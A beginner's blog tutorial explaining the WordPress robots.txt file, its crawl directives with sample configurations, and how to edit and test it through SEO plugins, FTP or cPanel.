
A Beginner’s Guide to Robots.txt in WordPress

If you’re running a WordPress website, it’s essential to know how to use the Robots.txt file. It can help you keep your website healthy and Google-friendly. This article will show you how to create and edit a Robots.txt file in WordPress. We’ll also explain each line of code so you can customize it for your site. Let’s get started!

What is a Robots.txt File?

A Robots.txt file is a plain text file that tells search engine bots (like Googlebot) which pages on your website they can and cannot crawl. You can use it to keep bots away from low-value pages or to prevent certain types of bot traffic from overloading your server.

Where is the WordPress Robots.txt Located?

Robots.txt is a text file located in your root WordPress directory. You can access it via FTP or the File Manager in your hosting cPanel. To view the file, go to your-website.com/robots.txt in your browser and press Enter.

The WordPress Robots.txt default code

Here is the default Robots.txt code that WordPress generates automatically (a virtual file, shown when no physical robots.txt exists):

User-agent: *
Disallow: /wp-admin/
Allow: /wp-admin/admin-ajax.php

Be careful never to add a bare Disallow: / line here: that single rule blocks bots from your entire site.

What Rules to Include in Your WordPress Robots.txt File?

You can add any of the following rules to your Robots.txt file to control which bots can crawl which pages on your website:

Allow: /
Disallow: /folder/
Disallow: /file.html
Sitemap: https://your-website.com/sitemap_index.xml
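Putting these directives together, a simple Robots.txt file might look like this (a sketch; /private/ and /thank-you.html are placeholder paths, and the sitemap URL should be replaced with your own):

# Apply the rules below to all bots
User-agent: *
# Allow everything by default
Allow: /
# Keep bots out of one folder and one file
Disallow: /private/
Disallow: /thank-you.html
# Point bots to the XML sitemap (full URL required)
Sitemap: https://your-website.com/sitemap_index.xml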

What is a User-agent?

A user agent is a software agent acting on behalf of a user, such as a web browser or a search engine crawler. The User-agent: * line in Robots.txt means that the rules which follow apply to all bots.
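You can also target a specific bot by name instead of all bots at once. For example (a sketch; Googlebot is the real name of Google’s crawler, and the paths are placeholders):

# Rules that apply only to Google's crawler
User-agent: Googlebot
Disallow: /not-for-google/

# Rules that apply to every other bot
User-agent: *
Disallow: /private/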

What is the Allow Directive?

The Allow directive lets bots crawl certain pages even when those pages sit inside a disallowed folder.
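The classic WordPress example is admin-ajax.php: the admin area is blocked, but this one file inside it stays crawlable because many themes and plugins rely on it:

User-agent: *
# Block the admin area...
Disallow: /wp-admin/
# ...but keep admin-ajax.php inside it reachable
Allow: /wp-admin/admin-ajax.php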

What is the Disallow Directive?

The Disallow directive prevents certain pages from being crawled. You can use it to keep bots away from low-value pages or to prevent certain types of bot traffic from overloading your server.
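A common use is blocking WordPress internal search result pages, which add crawl load without offering anything worth ranking (a sketch; /?s= is WordPress’s default search URL pattern, and /search/ is a placeholder for sites with pretty search permalinks):

User-agent: *
# Block internal search result pages
Disallow: /?s=
Disallow: /search/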

What is the Sitemap Directive?

The Sitemap directive tells bots where to find your website’s sitemap. This file lists the pages on your website, typically including each URL, its last modification date, and how often it changes.
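For example (assuming the sitemap_index.xml location that Yoast SEO uses by default; the news sitemap line is a hypothetical second entry):

# The sitemap location must be a full, absolute URL
Sitemap: https://your-website.com/sitemap_index.xml
# Multiple Sitemap lines are allowed
Sitemap: https://your-website.com/news-sitemap.xml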

What is Crawl Delay?

Crawl delay is the number of seconds a bot should wait between requests to your website. It can be used to stop a single bot from overloading your server with too many requests at once. Keep in mind that support varies: Bing honors the Crawl-delay directive, but Googlebot ignores it.
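For example, to ask Bing’s crawler to wait ten seconds between requests (a sketch; tune the number to your server’s capacity):

# Applies only to Bing's crawler
User-agent: Bingbot
# Wait 10 seconds between requests
Crawl-delay: 10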

How to Implement Robots.txt in WordPress?

Now that we’ve gone over the basics of Robots.txt, let’s look at how to implement it in WordPress.

There are two ways to edit your Robots.txt file: via the WordPress admin panel or by directly editing the file through FTP.

Using Plugins to Edit Robots.txt

If you want to edit your Robots.txt file from the WordPress admin panel, you can use a plugin like Yoast SEO or All in One SEO Pack.

These plugins give you a graphical interface for editing your Robots.txt file and provide helpful tips for creating effective rules. They also allow you to generate a sitemap and submit it to Google Search Console.

Editing Robots.txt Using Yoast SEO

To edit your Robots.txt file using the Yoast SEO plugin, go to SEO → Tools → File Editor.

On the Robots.txt tab, you can edit your Robots.txt file and see a preview of how it will look to bots.

Editing Robots.txt Using All in One SEO Pack

To edit your Robots.txt file using the All in One SEO Pack plugin, go to General Settings → Security → Robots.txt Manager.

Editing Robots.txt Manually 

If you’re not using a plugin, you can edit your Robots.txt file directly by following these steps:

Log into your WordPress site via FTP.

Navigate to the root directory of your WordPress installation. This is usually /public_html/.

Download the Robots.txt file to your computer.

Edit the Robots.txt file in a text editor like Notepad++ or Sublime Text.

Upload the Robots.txt file back to your server, overwriting the existing file.

You can also edit the Robots.txt file directly from cPanel → File Manager:

Log into your WordPress site via cPanel.

Navigate to the root directory of your WordPress installation. This is usually /public_html/.

Click on the Robots.txt file and select Edit from the menu.

A popup window will appear. If prompted for a character encoding, choose UTF-8 (the standard encoding for robots.txt) and click Edit.

Make your changes to the Robots.txt file and click Save Changes when you’re done.

As you can see, there are many different ways that you can edit your Robots.txt file. Which method you choose will depend on your level of comfort with editing code and files on your server.

How to Optimize the WordPress Robots.txt File for SEO?

Here are a few tips on how to optimize your Robots.txt file for SEO:

– Use the Allow directive to allow bots to crawl essential pages on your website.

– Use the Disallow directive to keep low-value pages out of the search engine index.

– Use the Sitemap directive to tell bots where to find your website’s sitemap.

– Use Crawl Delay to keep individual bots from overloading your server with too many requests at once (see the combined example after this list).
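Putting these tips together, an SEO-friendly WordPress Robots.txt might look like this (a sketch; the blocked paths and sitemap URL are examples to adapt, and remember that Googlebot ignores Crawl-delay):

User-agent: *
# Block the admin area but keep admin-ajax.php reachable
Disallow: /wp-admin/
Allow: /wp-admin/admin-ajax.php
# Keep low-value internal search results out of the crawl
Disallow: /?s=
# Ask bots that honor it to slow down
Crawl-delay: 10
# Tell bots where the sitemap lives
Sitemap: https://your-website.com/sitemap_index.xml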

How to Test the Robots.txt File?

After you have edited your Robots.txt file, it is crucial to test it to make sure that it is working as intended.

There are a few ways to test your Robots.txt file:

– Use the Google Search Console Robots.txt Tester tool.

– Use the Bing Webmaster Tools Robots.txt Tester tool.

– Use the Robots.txt Validator tool.

– Use the Robots Testing Tool from SEO Book.


That’s it! You now know how to edit and optimize your Robots.txt file for WordPress.

What are the Best Practices for WordPress Robots.txt?

There are a few key things to keep in mind when it comes to Robots.txt in WordPress:

– Robots.txt should be used to tell search engines which pages on your site they can and cannot crawl.

– Never rely on Robots.txt to hide pages from search results: a disallowed page can still be indexed if other sites link to it. Use a noindex meta tag instead for pages you want kept out of the index.

– Robots.txt should be located in the root directory of your WordPress site.

– Every rule group should start with a User-agent line, followed by the Allow and Disallow directives that apply to those bots, as in the sketch below.
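For example, a correctly structured file opens each group with a User-agent line (a sketch with placeholder paths):

# Group 1: rules for Googlebot only
User-agent: Googlebot
Disallow: /drafts/

# Group 2: rules for all other bots
User-agent: *
Disallow: /private/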

Conclusion

Robots.txt in WordPress is a simple text file that tells search engines which pages they can and cannot crawl on your site. By following the best practices above, you can ensure that your Robots.txt file is doing its job correctly.

Do you have any questions about Robots.txt in WordPress? Leave a comment below and let us know!

Looking for more WordPress tutorials? Check out our blog for more helpful articles.

Happy blogging!
